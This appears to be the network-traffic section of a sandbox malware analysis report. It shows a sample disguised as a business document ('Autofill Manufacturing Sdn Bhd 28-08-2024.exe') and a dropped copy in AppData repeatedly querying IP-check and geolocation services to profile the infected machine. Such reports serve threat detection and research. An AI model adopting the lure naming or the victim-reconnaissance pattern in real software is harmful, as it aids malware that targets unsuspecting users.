                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.1049712193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:18.752340078 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:21.342185974 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:21 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 5d3e5ded260236daf0c365a79d571e0e
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.1049714193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:21.974529982 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:23.376174927 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:23 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: d24022b95049733b773428aa42a35caa
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.1049716193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:24.159569025 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:26.261574984 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:26 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 4306108d475c4fcf4261ddc2bf806528
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.1049719193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:25.695883989 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:26.333369970 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:26 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: ccae17a39b21a2446c77fc20243022aa
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.1049722193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:27.206661940 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:28.813514948 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:28 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 1c7a59a2ed37f214d19094eb4032a3cf
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.1049723193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:27.225986958 CEST127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Aug 29, 2024 12:16:28.651659012 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:28 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 2e11663cb27af9a8604b3957e7fec16b
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.1049728193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:29.403533936 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:31.033838034 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:30 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 242aa98ec8612e1154ea9c08ab187eb4
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.1049729193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:29.476536036 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:30.101130962 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:30 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: bfff248817b7f5e9d09006d16e2a34bf
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.1049734193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:30.732157946 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:31.357146978 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:31 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 336c70687836e298205749249e26209c
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.1049737193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:31.662296057 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:32.549835920 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 38c30e808534174e33ccb36906203f91
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.1049738193.122.6.168804820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:31.980546951 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:32.630202055 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 930a613bc4e929580f5e17705fb7754a
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.1049741193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:33.189429998 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:33.834775925 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:33 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 11121071a7102f9e51506116cb18ce4e
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.1049744193.122.6.168804268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 29, 2024 12:16:34.461662054 CEST151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Aug 29, 2024 12:16:35.112150908 CEST320INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:35 GMT
                                        Content-Type: text/html
                                        Content-Length: 103
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        X-Request-ID: 606670280e472405c24fdd47e3521372
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.1049707188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:17 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:17 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25160
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xOyjbHZlrcDiNuylwms071IqSEGJ9jUIl0XnphUZQ%2BgazZ3H93qp0nRPn6V7VMaRc636XAnaahGEHXydva589h7ydZHyE6zckfqPUrQwnzwCzZtZJd6Z98T2%2BcfGfP4Xcn9xqFdc"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc8e4b85c0f95-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.1049710188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:18 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:18 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25161
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3e1zCXn0LNJHog9bqaoS2n8PvMRh4MAgPhpZKqtMloSyjzTniYJEivQuOW7bKlMPfbGbOCethG5kpFiTBEUwzmUYVR47xRIfuZ5Msnbys3yCTth7x%2FZV%2BdUeYOqxmKsMBXOkanqd"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc8ecc96942e3-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.1049713188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:21 UTC712INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:21 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25164
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZp%2BYpmiK34YX8y%2FnSDFkzIzEoibf4GeutwAPyqQaaZJ5oaH5l1lTWWazHrAZ6Rdf2IzeyLYc%2BMf1b0lM8lz6fRGoHGUA4mVSMWb9IwSgQXR1OzJ%2BZdWWC4TTtB6tCUHQB%2Fe6ltm"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc900dd6543fb-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.1049715188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:24 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:24 UTC708INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:24 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25167
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qx6z2xDAxA1RUJLmMegha%2FVdJzUL8i6YdYkES2ygX8Q7aA7VTVhSxUwucPcXtW4%2BGmWWiD49g79o%2BjcTI9lQnnBZZ2F%2BaDEcOnVIbpaUIjV2QQFgxOKZZZDH3NWVUJpK1xHtfo4l"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc90e8f9a43b3-EWR
                                        alt-svc: h3=":443"; ma=86400
